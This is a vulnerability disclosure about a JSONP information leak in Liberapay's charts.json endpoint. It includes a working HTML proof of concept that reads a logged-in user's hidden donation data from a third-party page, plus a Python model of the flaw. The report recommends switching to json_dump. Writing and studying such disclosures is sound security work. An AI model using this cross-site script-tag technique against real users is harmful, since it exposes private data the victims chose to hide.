Hello!
The /username/charts.json endpoint can return a JSONP callback because jsonp_dump is used as the renderer in the file charts.json.spt. It appears that the content of the JSONP response depends on who is authenticated: if the participant enabled the privacy setting that hides their receiving-donation data, a 403 error is returned unless the requester is that participant (or an admin).
This happens here:

    if participant.hide_receiving:
        if user != participant and not user.is_admin:
            raise response.error(403)
The vulnerable code is here:
[---] application/json via jsonp_dump
Basically, jsonp_dump is unnecessary in this case (I did not notice a case where cross-domain requests need to be made), and it should be replaced with json_dump instead.

With jsonp_dump, any site can load the endpoint in a <script> tag with a callback parameter. The victim's browser attaches their Liberapay session cookie to that request, so the 403 check above passes, and the callback hands the user's receiving-donation data to the third-party page despite their privacy settings. This leads to unwanted information disclosure.
    <script>
      function rip(a) {
        alert(JSON.stringify(a[1]));
      }
    </script>
    <script src="https://liberapay.com/~153779/charts.json?callback=rip"></script>
Host this file, visit it while authenticated to Liberapay, and it will alert the entry at index 1 of the returned JSON array. If you have not received any donation through Liberapay so far, an empty JSON array is returned (and a[1] is undefined).
This leads to unwanted information disclosure because the privacy settings of the user are ignored.
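To make the difference between the two renderers concrete, here is an added Python model of the endpoint and of the attacker's page. It is illustration only, not code from this report or from Liberapay: the Participant class, the chart rows and their field names are constructed stand-ins, and jsonp_dump is approximated as "wrap the JSON in callback(...) when ?callback= is given". The access check is the one quoted above. The model shows that the check is not what fails: the victim's own browser passes it, and only the JSONP wrapper turns the response into a script a third-party page can execute and read.

```python
import json
import re

# Constructed sample rows standing in for a participant's receiving-donation
# chart; the field names are assumptions, not Liberapay's real schema.
SAMPLE_ROWS = [
    {"date": "2016-01-01", "npatrons": 2, "receipts": "4.00"},
    {"date": "2016-02-01", "npatrons": 3, "receipts": "6.50"},
]


class Forbidden(Exception):
    """Stand-in for response.error(403)."""


class Participant:
    """Hypothetical minimal stand-in for the Liberapay participant/user object."""

    def __init__(self, username, hide_receiving=False, is_admin=False):
        self.username = username
        self.hide_receiving = hide_receiving
        self.is_admin = is_admin


ANON = Participant("anonymous")  # unauthenticated request


def charts_data(participant, user):
    """Same access check as the simplate: hidden data is only served to the
    participant themself or to an admin; everyone else gets a 403."""
    if participant.hide_receiving:
        if user != participant and not user.is_admin:
            raise Forbidden(403)
    return list(SAMPLE_ROWS)


def json_dump(data, callback=None):
    """Plain JSON renderer: a ?callback= parameter is ignored."""
    return "application/json", json.dumps(data)


def jsonp_dump(data, callback=None):
    """Approximation (assumed) of the jsonp_dump renderer: with ?callback= the
    JSON is wrapped in a function call so a <script src=...> tag can run it."""
    body = json.dumps(data)
    if callback:
        return "application/javascript", "%s(%s)" % (callback, body)
    return "application/json", body


def serve(participant, user, renderer, callback=None):
    """Render /username/charts.json for a request made by `user`'s browser."""
    return renderer(charts_data(participant, user), callback)


def request_status(participant, user):
    """HTTP status the access check produces for this requester."""
    try:
        charts_data(participant, user)
        return 200
    except Forbidden:
        return 403


_CALL = re.compile(r"^([A-Za-z_$][\w$]*)\((.*)\)$", re.S)


def attacker_script_tag(response, callbacks):
    """Model of the attacker's page: a <script src> tag executes whatever the
    victim's browser fetched, cookies included. Only a callback invocation hands
    the data to the page; a bare JSON array is an expression statement with no
    side effects, and the same-origin policy stops the page reading it."""
    content_type, body = response
    m = _CALL.match(body)
    if not m or m.group(1) not in callbacks:
        return None
    return callbacks[m.group(1)](json.loads(m.group(2)))


def leaked_rows(renderer):
    """Victim 'alice' hides her receiving data and is logged in while visiting
    the attacker's page. Returns what the attacker's rip() callback captured."""
    alice = Participant("alice", hide_receiving=True)
    stolen = []

    def rip(a):
        stolen.extend(a)

    # The session cookie makes user == participant, so the 403 check passes;
    # the cross-origin <script> tag is never subject to that check.
    attacker_script_tag(serve(alice, alice, renderer, callback="rip"), {"rip": rip})
    return stolen


if __name__ == "__main__":
    print("jsonp_dump leaks:", leaked_rows(jsonp_dump))
    print("json_dump leaks: ", leaked_rows(json_dump))
    print("anonymous request status:",
          request_status(Participant("alice", hide_receiving=True), ANON))
```

The takeaway is the one the fix relies on: with json_dump the same-origin pages that legitimately need the data can still fetch it with XMLHttpRequest, while a cross-origin page is left with a script tag it cannot read. JSONP should never be used on a response whose contents depend on the requester's session cookie.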